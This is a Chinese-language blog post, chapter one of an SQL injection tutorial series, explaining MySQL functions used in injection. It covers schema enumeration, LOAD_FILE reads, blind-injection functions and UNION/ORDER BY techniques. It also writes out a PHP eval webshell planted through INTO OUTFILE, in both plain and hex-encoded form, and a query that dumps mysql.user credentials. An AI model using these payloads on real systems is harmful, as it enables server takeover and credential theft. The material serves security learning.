<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  
  <title>SQL注入系列Chapter 1：MySQL基础知识 | 黑客技术学习分享自留地</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  
    <meta name="keywords" content="Sh4dow's  Blog">
  
  <meta name="description" content="这边文章记录在进行SQL注入时，需要具备的部分MySQL基础知识。">
<meta name="keywords" content="SQL注入,MySQL">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入系列Chapter 1：MySQL基础知识">
<meta property="og:url" content="https://sakuxa.com/2019/03/12/0x00-SQL注入系列之Mysql基础知识/index.html">
<meta property="og:site_name" content="黑客技术学习分享自留地">
<meta property="og:description" content="这边文章记录在进行SQL注入时，需要具备的部分MySQL基础知识。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://sakuxa.com/2019/03/12/0x00-SQL注入系列之Mysql基础知识/QQ截图20190312102557.png">
<meta property="og:image" content="https://sakuxa.com/2019/03/12/0x00-SQL注入系列之Mysql基础知识/01.png">
<meta property="og:image" content="https://sakuxa.com/2019/03/12/0x00-SQL注入系列之Mysql基础知识/02.png">
<meta property="og:image" content="https://sakuxa.com/2019/03/12/0x00-SQL注入系列之Mysql基础知识/03.png">
<meta property="og:image" content="https://sakuxa.com/2019/03/12/0x00-SQL注入系列之Mysql基础知识/04.png">
<meta property="og:image" content="https://sakuxa.com/2019/03/12/0x00-SQL注入系列之Mysql基础知识/QQ截图20190312110721.png">
<meta property="og:image" content="https://sakuxa.com/2019/03/12/0x00-SQL注入系列之Mysql基础知识/05.png">
<meta property="og:image" content="https://sakuxa.com/2019/03/12/0x00-SQL注入系列之Mysql基础知识/06.png">
<meta property="og:image" content="https://sakuxa.com/2019/03/12/0x00-SQL注入系列之Mysql基础知识/07.png">
<meta property="og:image" content="https://sakuxa.com/2019/03/12/0x00-SQL注入系列之Mysql基础知识/08.png">
<meta property="og:image" content="https://sakuxa.com/2019/03/12/0x00-SQL注入系列之Mysql基础知识/09.png">
<meta property="og:image" content="https://sakuxa.com/2019/03/12/0x00-SQL注入系列之Mysql基础知识/QQ截图20190312143549.png">
<meta property="og:image" content="https://sakuxa.com/2019/03/12/0x00-SQL注入系列之Mysql基础知识/QQ截图20190318142002.png">
<meta property="og:image" content="https://sakuxa.com/2019/03/12/0x00-SQL注入系列之Mysql基础知识/QQ截图20190318142657.png">
<meta property="og:updated_time" content="2019-05-21T03:52:40.775Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SQL注入系列Chapter 1：MySQL基础知识">
<meta name="twitter:description" content="这边文章记录在进行SQL注入时，需要具备的部分MySQL基础知识。">
<meta name="twitter:image" content="https://sakuxa.com/2019/03/12/0x00-SQL注入系列之Mysql基础知识/QQ截图20190312102557.png">
  
  
    <link rel="icon" href="/LimeWire.png">
  
  <link href="//cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" type="text/css">
  <link rel="stylesheet" href="/css/style.css">
  <script src="/js/pace.min.js"></script>
  

  
  

</head>
</html>
<body>
  <div id="container">
      <header id="header">
    <div id="banner"></div>
    <div id="header-outer">
        <div id="header-menu" class="header-menu-pos animated">
            <div class="header-menu-container">
                <a href="/" class="left">
                    <span class="site-title">Sh4dow&#39;s Blog</span>
                </a>
                <nav id="header-menu-nav" class="right">
                    
                    <a href="/">
                        <i class="fa fa-home"></i>
                        <span>Home</span>
                    </a>
                    
                    <a href="/archives">
                        <i class="fa fa-archive"></i>
                        <span>Archives</span>
                    </a>
                    
                    <a href="/about">
                        <i class="fa fa-user"></i>
                        <span>About</span>
                    </a>
                    
                </nav>
                <a class="mobile-header-menu-button">
                    <i class="fa fa-bars"></i>
                </a>
            </div>
        </div>
        <div id="header-row">
            <div id="logo">
                <a href="/">
                    <img src="/images/avatar1.png" alt="logo">
                </a>
            </div>
            <div class="header-info">
                <div id="header-title">
                    
                </div>
                <div id="header-description">
                    
                    <h3>
                        不能成为自己喜欢的人，至少成为自己认可的黑客。
                    </h3>
                    
                </div>
            </div>
            <nav class="header-nav">
                <div class="social">
                    
                        <a title="Home" target="_blank" href="https://sakuxa.com">
                            <i class="fa fa-home fa-2x"></i></a>
                    
                        <a title="Github" target="_blank" href="https://github.com/sh4douu">
                            <i class="fa fa-github fa-2x"></i></a>
                    
                        <a title="Weibo" target="_blank" href="https://sakuxa.com">
                            <i class="fa fa-weibo fa-2x"></i></a>
                    
                        <a title="Twitter" target="_blank" href="https://sakuxa.com">
                            <i class="fa fa-twitter fa-2x"></i></a>
                    
                </div>
            </nav>
        </div>
    </div>
</header>
      <div class="outer">
        <section id="main" class="body-wrap"><article id="post-0x00-SQL注入系列之Mysql基础知识" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-inner">
    
      <header class="article-header">
        
  
    <h1 class="post-title" itemprop="name">
      SQL注入系列Chapter 1：MySQL基础知识
    </h1>
    <div class="post-title-bar">
      <ul>
          
              <li>
                  <i class="fa fa-book"></i>
                  
                      <a href="/categories/WEB漏洞学习/">WEB漏洞学习</a>
                  
              </li>
          
        <li>
          <i class="fa fa-calendar"></i>  2019-03-12
        </li>
        <li>
          <i class="fa fa-eye"></i>
          <span id="busuanzi_value_page_pv"></span>
        </li>
      </ul>
    </div>
  

          
      </header>
    
    <div class="article-entry post-content" itemprop="articleBody">
      
            
            <blockquote>
<p>这边文章记录在进行SQL注入时，需要具备的部分MySQL基础知识。</p>
</blockquote>
<a id="more"></a>
<h2 id="一、MySQLi常用函数"><a href="#一、MySQLi常用函数" class="headerlink" title="一、MySQLi常用函数"></a>一、MySQLi常用函数</h2><h3 id="0x00-系统函数"><a href="#0x00-系统函数" class="headerlink" title="0x00 系统函数"></a>0x00 系统函数</h3><ul>
<li><strong><code>@@version_compile_os</code></strong>：操作系统版本</li>
<li><strong><code>@basedir</code></strong>：MySQL安装路径</li>
<li><strong><code>version()</code></strong>：MySQL版本</li>
<li><strong><code>user()</code></strong>：当前数据库用户</li>
<li><strong><code>@@datadir</code></strong>：数据库路径</li>
<li><strong><code>database()</code></strong>：当前所处数据库名</li>
</ul>
<p><img src="/2019/03/12/0x00-SQL注入系列之Mysql基础知识/QQ截图20190312102557.png" alt></p>
<h3 id="0x01-字符串拼接函数"><a href="#0x01-字符串拼接函数" class="headerlink" title="0x01 字符串拼接函数"></a>0x01 字符串拼接函数</h3><ul>
<li><strong><code>Concat()</code></strong></li>
<li><strong><code>Concat_WS()</code></strong></li>
<li><strong><code>GROUP_CONCAT()</code></strong></li>
</ul>
<blockquote>
<p>在MySQLi中，拼接函数的作用在于将多行数据合并为一行，因为在注入中有时候能显示的行数是有限的。</p>
</blockquote>
<p><strong>1.Concat(str1,str2,…)</strong></p>
<p>返回结果为拼接参数得到的字符串。</p>
<p>如有任何一个参数为NULL,则返回值为NULL。可以有一个或多个参数。</p>
<p><img src="/2019/03/12/0x00-SQL注入系列之Mysql基础知识/01.png" alt></p>
<ul>
<li><strong><code>select concat(user,&quot;,&quot;,password) from mysql.user;</code></strong></li>
</ul>
<p><img src="/2019/03/12/0x00-SQL注入系列之Mysql基础知识/02.png" alt></p>
<p><strong>2.Concat_WS(separator,str1,str2,…)</strong></p>
<p><code>separator</code>为拼接字符串之间的分隔符。</p>
<p><img src="/2019/03/12/0x00-SQL注入系列之Mysql基础知识/03.png" alt></p>
<p><img src="/2019/03/12/0x00-SQL注入系列之Mysql基础知识/04.png" alt></p>
<p><strong>3.GROUP_CONCAT()</strong></p>
<p><img src="/2019/03/12/0x00-SQL注入系列之Mysql基础知识/QQ截图20190312110721.png" alt></p>
<p>将DBMS中所有数据库名作为一列返回：</p>
<ul>
<li><strong><code>select group_concat(schema_name) from information_schema.schemata;</code></strong></li>
</ul>
<p>将指定数据库的所有表名作为一列返回：</p>
<ul>
<li><strong><code>select group_concat(table_name) from information_schema.tables where table_schema=&#39;db_name&#39;;</code></strong></li>
</ul>
<p>将指定数据表的所有列名作为一列返回：</p>
<ul>
<li><strong><code>select group_concat(column_name) from information_schema.columns where table_name=&#39;tb_name&#39;;</code></strong></li>
</ul>
<h3 id="0x02-字符-数字函数"><a href="#0x02-字符-数字函数" class="headerlink" title="0x02 字符/数字函数"></a>0x02 字符/数字函数</h3><ul>
<li><strong><code>ASCII()</code></strong>: 返回字符对应的ASCII码值。</li>
<li><strong><code>ORD()</code></strong>：返回字符对应的ASCII码值。</li>
<li><strong><code>CHAR()</code></strong>：返回数字对应的ASCII字符。</li>
</ul>
<p><img src="/2019/03/12/0x00-SQL注入系列之Mysql基础知识/05.png" alt></p>
<ul>
<li><strong><code>BIN()</code></strong>: 返回数字对应的二进制串。</li>
<li><strong><code>CONV(Num,from_base,to_base)</code></strong>: 数字进制转换。</li>
</ul>
<p><img src="/2019/03/12/0x00-SQL注入系列之Mysql基础知识/06.png" alt></p>
<ul>
<li><strong><code>HEX()</code></strong>:十六进制编码</li>
<li><strong><code>UNHEX()</code></strong>：十六进制解码</li>
</ul>
<p><img src="/2019/03/12/0x00-SQL注入系列之Mysql基础知识/07.png" alt></p>
<ul>
<li><strong><code>FLOOR()</code></strong>：向下取整</li>
<li><strong><code>RAND()</code></strong>：用于产生一个0~1的随机数</li>
</ul>
<p><img src="/2019/03/12/0x00-SQL注入系列之Mysql基础知识/08.png" alt></p>
<ul>
<li><strong><code>LOWER()</code></strong>：转成小写字母</li>
<li><strong><code>UPPER()</code></strong>: 转成大写字母</li>
</ul>
<h3 id="0x03-字符串切片函数"><a href="#0x03-字符串切片函数" class="headerlink" title="0x03 字符串切片函数"></a>0x03 字符串切片函数</h3><ul>
<li><strong><code>MID(string，start，count)</code></strong>：从字符串下标为<code>start</code>处开始切取<code>count</code>个字符（下标从1开始）。</li>
<li><strong><code>SUBSTR()</code></strong>：同上。</li>
<li><strong><code>SUBSTRING()</code></strong>：同上。</li>
<li><strong><code>LEFT(string, n)</code></strong>：获取从字符串左边开始的指定n个字符。</li>
</ul>
<p><img src="/2019/03/12/0x00-SQL注入系列之Mysql基础知识/09.png" alt></p>
<h3 id="0x04-盲注相关函数"><a href="#0x04-盲注相关函数" class="headerlink" title="0x04 盲注相关函数"></a>0x04 盲注相关函数</h3><ul>
<li><strong><code>sleep(n)</code></strong>：阻塞n秒。</li>
<li><strong><code>len()</code></strong>：返回字符串的长度。</li>
<li><strong><code>if(expr1,expr2,expr3)</code></strong>：如果expr1是TRUE ，则值为expr2; 否则为 expr3。</li>
</ul>
<h3 id="0x05-读文件-Load-file"><a href="#0x05-读文件-Load-file" class="headerlink" title="0x05 读文件 Load_file()"></a>0x05 读文件 Load_file()</h3><blockquote>
<p>读取文件并返回该文件的内容作为一个字符串，读取失败返回NULL。</p>
</blockquote>
<p><strong>使用条件</strong>：</p>
<blockquote>
<ol>
<li><p>连接数据库的用户有<code>file_priv</code>权限，启动<code>mysqld</code>用户必须拥有对此文件读取的权限。</p>
<blockquote>
<p>查看用户的<code>file_priv</code>权限：<code>select User,File_priv from mysql.user;</code></p>
</blockquote>
</li>
<li><p>欲读取文件必须在服务器上。</p>
</li>
<li><p>必须指定文件的绝对路径。</p>
</li>
<li><p>欲读取文件必须小于 max_allowed_packet。</p>
<blockquote>
<p>查看允许最大包长度：<code>show global variables like &quot;max_allow%&quot;;</code></p>
</blockquote>
</li>
<li><p>如果<code>secure_file_priv</code>非NULL，则只能读取对应目录下的文件。当<code>secure_file_priv</code>的值为NULL ，表示限制<code>mysqld</code>不允许导入|导出。</p>
<blockquote>
<p>查看允许读取的路径：<code>show  variables like &quot;secure_file%&quot;;</code></p>
</blockquote>
</li>
</ol>
</blockquote>
<p><strong>使用例子：</strong></p>
<blockquote>
<p> 注意路径符号的处理，要么使用<code>/</code>，使用Windows的<code>\</code>需要进行转义，即<code>\\</code>。</p>
<ol>
<li><p><strong><code>SELECT LOAD_FILE(&quot;C://TEST.txt&quot;)</code></strong></p>
</li>
<li><p><strong><code>SELECT LOAD_FILE(&quot;C:/TEST.txt&quot;)</code></strong></p>
</li>
<li><p><strong><code>SELECT LOAD_FILE(&quot;C:\\TEST.txt&quot;)</code></strong></p>
</li>
<li><p><strong><code>SELECT LOAD_FILE(CHAR(67,58,92,92,84,69,83,84,46,116,120,116))</code></strong></p>
<blockquote>
<p><code>CHAR(67,58,92,92,84,69,83,84,46,116,120,116)</code>得到的是<code>C:\\TEST.txt</code>。</p>
</blockquote>
</li>
<li><p><strong><code>SELECT LOAD_FILE(0x433a5c5c544553542e747874)</code></strong></p>
<blockquote>
<p><code>0x433a5c5c544553542e747874</code>是<code>C:\\TEST.txt</code>经过十六进制编码得到的。</p>
</blockquote>
</li>
</ol>
</blockquote>
<h3 id="0x03-写（导入）文件"><a href="#0x03-写（导入）文件" class="headerlink" title="0x03 写（导入）文件"></a>0x03 写（导入）文件</h3><p><strong>select … into outfile ‘filepath’</strong></p>
<p><strong>select … into dumpfile ‘filepath’</strong></p>
<blockquote>
<p>可以把查询的行写入一个文件中。</p>
</blockquote>
<p><strong>使用条件</strong>：</p>
<blockquote>
<ol>
<li><p>连接数据库的用户有<code>file_priv</code>权限，且启动<code>mysqld</code>的用户对目录需要有写权限。</p>
</li>
<li><p>文件路径必须为绝对路径，<code>file_name</code>不能是一个已经存在的文件。</p>
</li>
<li><p>如果<code>secure_file_priv</code>非NULL，则只能读取对应目录下的文件。当<code>secure_file_priv</code>的值为NULL ，表示限制<code>mysqld</code>不允许导入|导出。当<code>secure_file_priv</code>的值为空白，表示可以导入任意目录。</p>
<blockquote>
<p><code>show  variables like &quot;secure_file%&quot;;</code></p>
</blockquote>
</li>
</ol>
</blockquote>
<p><strong>写入Webshell条件</strong>：</p>
<blockquote>
<ol>
<li>需要知道网站的绝对物理路径，这样导出后的webshell可访问。</li>
<li>写入的目录有写权限。</li>
<li><code>secure_file_priv</code>非NULL且包含了WEB路径。</li>
</ol>
</blockquote>
<p><strong>写入Webshell</strong>：</p>
<blockquote>
<ul>
<li><strong><code>select &quot;&lt;?php @eval($_POST[sh4douu])?&gt;&quot;  into outfile &quot;X:\\phpstudy\\PHPTutorial\\WWW\\shell.php&quot;;</code></strong></li>
<li><strong><code>select &quot;&lt;?php @eval($_POST[sh4douu])?&gt;&quot;  into dumpfile &quot;X:\\phpstudy\\PHPTutorial\\WWW\\shell.php&quot;;</code></strong></li>
</ul>
</blockquote>
<p><strong>LINES TERMINATED BY</strong></p>
<p>用于不是<code>Union Select</code>时。</p>
<blockquote>
<ol>
<li><p>使用格式：</p>
<blockquote>
<p><strong><code>Select version() into outfile &#39;X:/phpstudy/PHPTutorial/WWW/shell.php&#39; LINES TERMINATED BY [十六进制数据]</code></strong></p>
</blockquote>
</li>
<li><p>例子：</p>
<blockquote>
<p><strong><code>Select user From mysql.user where user=&quot;root&quot; limit 1 into outfile &#39;X:/phpstudy/PHPTutorial/WWW/shell.php&#39; LINES TERMINATED BY 0x3C3F70687020406576616C28245F504F53545B736834646F75755D293F3E;</code></strong></p>
<blockquote>
<p>0x3C3F70687020406576616C28245F504F53545B736834646F75755D293F3E是经过十六进制编码后的<code>&lt;?php @eval($_POST[sh4douu])?&gt;</code>，<code>Lines Terminated By</code>就是在查询到的数据最后再加入指定的数据然后一并写到文件中。如下图，查询到数据为<code>root</code>，之后的一句话木马是<code>Lines Terminated By</code>之后的十六进制数据解码得到的字符。</p>
</blockquote>
</blockquote>
</li>
<li><p>此外还有<code>FIELDS TERMINATED BY</code>也是类似功能，它是在查询到的数据之间插入数据，但如果查询的数据只有一列，那么将不会被插入数据。</p>
</li>
</ol>
</blockquote>
<p><img src="/2019/03/12/0x00-SQL注入系列之Mysql基础知识/QQ截图20190312143549.png" alt></p>
<p><strong>dumpfile与outfile区别</strong>：</p>
<ol>
<li><code>outfile</code> 可以导出每行。<code>dumpfile</code> 只能导出一行（将目标文件写入同一行内；</li>
<li><code>outfile</code>不可导出二进制文件，文件会被破坏，转义等。<code>dumpfile</code>可导出完整可执行二进制文件。</li>
</ol>
<h3 id="0x04-Union-Select"><a href="#0x04-Union-Select" class="headerlink" title="0x04 Union Select"></a>0x04 Union Select</h3><p><code>UNION</code>操作符用于合并两个或多个<code>SELECT</code>语句的结果集。</p>
<p><code>UNION</code>只是将两个查询结果联结起来在一列显示，并不是联结两个表。</p>
<p><code>UNION ALL</code>和<code>UNION</code>不同之处在于<code>UNION ALL</code>会将所有符合条件的都列出来，既不去重复的值。而<code>UNION</code>去重。</p>
<p><strong>使用条件</strong>：</p>
<blockquote>
<ol>
<li>UNION 内部的 SELECT 语句必须拥有相同数量的列。</li>
<li>列也必须拥有相似的数据类型。</li>
<li>每条 SELECT 语句中的列的顺序必须相同。</li>
</ol>
</blockquote>
<p><img src="/2019/03/12/0x00-SQL注入系列之Mysql基础知识/QQ截图20190318142002.png" alt></p>
<p><strong>Order by</strong></p>
<p><code>ORDER BY</code>语句用于根据指定的列对结果集进行排序。</p>
<p>在SQLi中，<code>order by</code>用于寻找查询的列数，因为根据前面我们知道<code>union select</code>使用条件之一是要列数相等。</p>
<p><code>order by</code>之后可以跟一个数字，当数字大于查询的列数时，就会报错。由此可以得知，<code>order by</code>允许接的最大数字就是实际查询的列数。</p>
<p><img src="/2019/03/12/0x00-SQL注入系列之Mysql基础知识/QQ截图20190318142657.png" alt></p>
<h3 id="0x05-注释"><a href="#0x05-注释" class="headerlink" title="0x05 注释"></a>0x05 注释</h3><p><strong>行间注释：</strong></p>
<ul>
<li><strong><code>--+</code></strong>（–之后一个空格）</li>
<li><strong><code>#</code></strong>（浏览器访问时需要编码成%23，否则被当作锚点起始）</li>
<li><code>；%00</code>(空字节)</li>
<li><em>`</em>(反引号)</li>
</ul>
<p><strong>行内注释：</strong></p>
<ul>
<li><strong><code>/*注释*/</code></strong></li>
<li>Mysql中，<code>/*! SQL 语句 */</code> 这种格式里面的 SQL 语句会当正常的语句一样被解析。</li>
</ul>

            <div class="post-copyright">
    <div class="content">
        <p>最后更新： 2019年05月21日 11:52</p>
        <p>原始链接： <a class="post-url" href="/2019/03/12/0x00-SQL注入系列之Mysql基础知识/" title="SQL注入系列Chapter 1：MySQL基础知识">https://sakuxa.com/2019/03/12/0x00-SQL注入系列之Mysql基础知识/</a></p>
        <footer>
            <a href="https://sakuxa.com">
                <img src="/images/avatar1.png" alt="sh4douu">
                sh4douu
            </a>
        </footer>
    </div>
</div>

      
        
            

        
    </div>
    <footer class="article-footer">
        
        
<div class="post-share">
    <a href="javascript:;" id="share-sub" class="post-share-fab">
        <i class="fa fa-share-alt"></i>
    </a>
    <div class="post-share-list" id="share-list">
        <ul class="share-icons">
          <li>
            <a class="weibo share-sns" target="_blank" href="http://service.weibo.com/share/share.php?url=https://sakuxa.com/2019/03/12/0x00-SQL注入系列之Mysql基础知识/&title=《SQL注入系列Chapter 1：MySQL基础知识》 — 黑客技术学习分享自留地&pic=images/timg17.jpg" data-title="微博">
              <i class="fa fa-weibo"></i>
            </a>
          </li>
          <li>
            <a class="weixin share-sns" id="wxFab" href="javascript:;" data-title="微信">
              <i class="fa fa-weixin"></i>
            </a>
          </li>
          <li>
            <a class="qq share-sns" target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=https://sakuxa.com/2019/03/12/0x00-SQL注入系列之Mysql基础知识/&title=《SQL注入系列Chapter 1：MySQL基础知识》 — 黑客技术学习分享自留地&source=
这边文章记录在进行SQL注入时，需要具备的部分MySQL基础知识。
" data-title="QQ">
              <i class="fa fa-qq"></i>
            </a>
          </li>
          <li>
            <a class="facebook share-sns" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=https://sakuxa.com/2019/03/12/0x00-SQL注入系列之Mysql基础知识/" data-title="Facebook">
              <i class="fa fa-facebook"></i>
            </a>
          </li>
          <li>
            <a class="twitter share-sns" target="_blank" href="https://twitter.com/intent/tweet?text=《SQL注入系列Chapter 1：MySQL基础知识》 — 黑客技术学习分享自留地&url=https://sakuxa.com/2019/03/12/0x00-SQL注入系列之Mysql基础知识/&via=https://sakuxa.com" data-title="Twitter">
              <i class="fa fa-twitter"></i>
            </a>
          </li>
          <li>
            <a class="google share-sns" target="_blank" href="https://plus.google.com/share?url=https://sakuxa.com/2019/03/12/0x00-SQL注入系列之Mysql基础知识/" data-title="Google+">
              <i class="fa fa-google-plus"></i>
            </a>
          </li>
        </ul>
     </div>
</div>
<div class="post-modal wx-share" id="wxShare">
    <a class="close" href="javascript:;" id="wxShare-close">×</a>
    <p>扫一扫，分享到微信</p>
    <img src="//api.qrserver.com/v1/create-qr-code/?data=https://sakuxa.com/2019/03/12/0x00-SQL注入系列之Mysql基础知识/" alt="微信分享二维码">
</div>

<div class="mask"></div>

        
        <ul class="article-footer-menu">
            
            
  <li class="article-footer-tags">
    <i class="fa fa-tags"></i>
      
    <a href="/tags/SQL注入/" class="color1">SQL注入</a>
      
    <a href="/tags/MySQL/" class="color1">MySQL</a>
      
  </li>

        </ul>
        
    </footer>
  </div>
</article>


    <aside class="post-toc-pos post-toc-top" id="post-toc">
        <nav class="post-toc-wrap">
            <ol class="post-toc"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#一、MySQLi常用函数"><span class="post-toc-text">一、MySQLi常用函数</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#0x00-系统函数"><span class="post-toc-text">0x00 系统函数</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#0x01-字符串拼接函数"><span class="post-toc-text">0x01 字符串拼接函数</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#0x02-字符-数字函数"><span class="post-toc-text">0x02 字符/数字函数</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#0x03-字符串切片函数"><span class="post-toc-text">0x03 字符串切片函数</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#0x04-盲注相关函数"><span class="post-toc-text">0x04 盲注相关函数</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#0x05-读文件-Load-file"><span class="post-toc-text">0x05 读文件 Load_file()</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#0x03-写（导入）文件"><span class="post-toc-text">0x03 写（导入）文件</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#0x04-Union-Select"><span class="post-toc-text">0x04 Union Select</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#0x05-注释"><span class="post-toc-text">0x05 注释</span></a></li></ol></li></ol>
        </nav>
    </aside>
    

<nav id="article-nav">
  
    <a href="/2019/03/15/记一次面试某安全公司一道XXE漏洞CTF面试题/" id="article-nav-newer" class="article-nav-link-wrap">

      <span class="article-nav-title">
        <i class="fa fa-hand-o-left" aria-hidden="true"></i>
        
          记一次面试某安全公司一道XXE漏洞CTF面试题
        
      </span>
    </a>
  
  
    <a href="/2019/03/11/0x02-XSS学习系列之练习靶场01/" id="article-nav-older" class="article-nav-link-wrap">
      <span class="article-nav-title">XSS学习系列Chapter 3：prompt(1) XSS挑战</span>
      <i class="fa fa-hand-o-right" aria-hidden="true"></i>
    </a>
  
</nav>



    
</section>
        
      </div>
      <footer id="footer">
  <div class="outer">
    <div id="footer-info" class="inner">
      
<p>
    <span id="busuanzi_container_site_uv" style="display:none">
        总访客数：<span id="busuanzi_value_site_uv"></span>
    </span>
    <span id="busuanzi_container_site_pv" style="display:none">
        总访问量：<span id="busuanzi_value_site_pv"></span>
    </span>
</p>


      <p>
        Powered by  <a href="http://hexo.io/" target="_blank">Hexo</a>
        Theme <a href="//github.com/wongminho/hexo-theme-miho" target="_blank">MiHo</a>
      &copy; 2019 sh4douu<br>
      </p>
    </div>
  </div>
</footer>
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<script src="//cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
<script>
  var mihoConfig = {
      root: "https://sakuxa.com",
      animate: true,
      isHome: false,
      share: true,
      reward: 0
  }
</script>
<div class="sidebar">
    <div id="sidebar-search" title="Search">
        <i class="fa fa-search"></i>
    </div>
    <div id="sidebar-category" title="Categories">
        <i class="fa fa-book"></i>
    </div>
    <div id="sidebar-tag" title="Tags">
        <i class="fa fa-tags"></i>
    </div>
    <div id="sidebar-top">
        <span class="sidebar-top-icon"><i class="fa fa-angle-up"></i></span>
    </div>
</div>
<div class="sidebar-menu-box" id="sidebar-menu-box">
    <div class="sidebar-menu-box-container">
        <div id="sidebar-menu-box-categories">
            <a class="category-link" href="/categories/Metasploit/">Metasploit</a><a class="category-link" href="/categories/Misc/">Misc</a><a class="category-link" href="/categories/Pikachu/">Pikachu</a><a class="category-link" href="/categories/Python/">Python</a><a class="category-link" href="/categories/Vulnhub/">Vulnhub</a><a class="category-link" href="/categories/WEB漏洞学习/">WEB漏洞学习</a><a class="category-link" href="/categories/Win32/">Win32</a><a class="category-link" href="/categories/内网渗透/">内网渗透</a><a class="category-link" href="/categories/无线渗透/">无线渗透</a><a class="category-link" href="/categories/漏洞复现/">漏洞复现</a><a class="category-link" href="/categories/语言/">语言</a>
        </div>
        <div id="sidebar-menu-box-tags">
            <a href="/tags/802-11/" style="font-size: 10px;">802.11</a> <a href="/tags/CSRF/" style="font-size: 10px;">CSRF</a> <a href="/tags/CTF/" style="font-size: 10px;">CTF</a> <a href="/tags/Getshell/" style="font-size: 10px;">Getshell</a> <a href="/tags/HTML文档解析/" style="font-size: 10px;">HTML文档解析</a> <a href="/tags/Kerberos/" style="font-size: 10px;">Kerberos</a> <a href="/tags/Language/" style="font-size: 20px;">Language</a> <a href="/tags/Linux/" style="font-size: 10px;">Linux</a> <a href="/tags/Mimikatz/" style="font-size: 10px;">Mimikatz</a> <a href="/tags/Msfvenom/" style="font-size: 11.67px;">Msfvenom</a> <a href="/tags/My-Ubuntu/" style="font-size: 10px;">My Ubuntu</a> <a href="/tags/MySQL/" style="font-size: 10px;">MySQL</a> <a href="/tags/NTLM/" style="font-size: 10px;">NTLM</a> <a href="/tags/NetBIOS/" style="font-size: 10px;">NetBIOS</a> <a href="/tags/OWASP-Top10-2017/" style="font-size: 10px;">OWASP Top10 2017</a> <a href="/tags/PHP/" style="font-size: 10px;">PHP</a> <a href="/tags/PHPCMSv9/" style="font-size: 10px;">PHPCMSv9</a> <a href="/tags/Pass-The-Hash/" style="font-size: 10px;">Pass The Hash</a> <a href="/tags/Payload/" style="font-size: 10px;">Payload</a> <a href="/tags/Python基础/" style="font-size: 18.33px;">Python基础</a> <a href="/tags/Python模块/" style="font-size: 13.33px;">Python模块</a> <a href="/tags/Re/" style="font-size: 10px;">Re</a> <a href="/tags/Reverse-shell/" style="font-size: 10px;">Reverse shell</a> <a href="/tags/SMB/" style="font-size: 10px;">SMB</a> <a href="/tags/SQL注入/" style="font-size: 10px;">SQL注入</a> <a href="/tags/Ubuntu-2-Mac/" style="font-size: 10px;">Ubuntu 2 Mac</a> <a href="/tags/WEB安全/" style="font-size: 13.33px;">WEB安全</a> <a href="/tags/WLAN/" style="font-size: 10px;">WLAN</a> <a href="/tags/Win32/" style="font-size: 16.67px;">Win32</a> <a href="/tags/Winodows/" style="font-size: 10px;">Winodows</a> <a href="/tags/XML/" style="font-size: 10px;">XML</a> <a href="/tags/XML注入/" style="font-size: 10px;">XML注入</a> <a href="/tags/XSS/" style="font-size: 15px;">XSS</a> <a href="/tags/XXE/" style="font-size: 11.67px;">XXE</a> <a href="/tags/base64/" style="font-size: 10px;">base64</a> <a href="/tags/subprocess/" style="font-size: 10px;">subprocess</a> <a href="/tags/任意文件下载/" style="font-size: 10px;">任意文件下载</a> <a href="/tags/干货/" style="font-size: 10px;">干货</a> <a href="/tags/必会技能/" style="font-size: 10px;">必会技能</a> <a href="/tags/技术/" style="font-size: 10px;">技术</a> <a href="/tags/收集/" style="font-size: 10px;">收集</a> <a href="/tags/文件上传/" style="font-size: 10px;">文件上传</a> <a href="/tags/文件包含/" style="font-size: 10px;">文件包含</a> <a href="/tags/文件描述符/" style="font-size: 10px;">文件描述符</a> <a href="/tags/文件权限/" style="font-size: 10px;">文件权限</a> <a href="/tags/无线渗透/" style="font-size: 10px;">无线渗透</a> <a href="/tags/暴力破解/" style="font-size: 10px;">暴力破解</a> <a href="/tags/权限提升/" style="font-size: 10px;">权限提升</a> <a href="/tags/汇编语言/" style="font-size: 16.67px;">汇编语言</a> <a href="/tags/环境搭建/" style="font-size: 10px;">环境搭建</a> <a href="/tags/管道/" style="font-size: 10px;">管道</a> <a href="/tags/编码与解码/" style="font-size: 10px;">编码与解码</a> <a href="/tags/跨站请求伪造/" style="font-size: 10px;">跨站请求伪造</a> <a href="/tags/过滤与绕过/" style="font-size: 10px;">过滤与绕过</a> <a href="/tags/重定向/" style="font-size: 10px;">重定向</a> <a href="/tags/靶场/" style="font-size: 15px;">靶场</a> <a href="/tags/靶机/" style="font-size: 10px;">靶机</a>
        </div>
    </div>
    <a href="javascript:;" class="sidebar-menu-box-close">&times;</a>
</div>
<div class="mobile-header-menu-nav" id="mobile-header-menu-nav">
    <div class="mobile-header-menu-container">
        <span class="title">Menus</span>
        <ul class="mobile-header-menu-navbar">
            
            <li>
                <a href="/">
                    <i class="fa fa-home"></i><span>Home</span>
                </a>
            </li>
            
            <li>
                <a href="/archives">
                    <i class="fa fa-archive"></i><span>Archives</span>
                </a>
            </li>
            
            <li>
                <a href="/about">
                    <i class="fa fa-user"></i><span>About</span>
                </a>
            </li>
            
        </ul>
    </div>
    <div class="mobile-header-tag-container">
        <span class="title">Tags</span>
        <div id="mobile-header-container-tags">
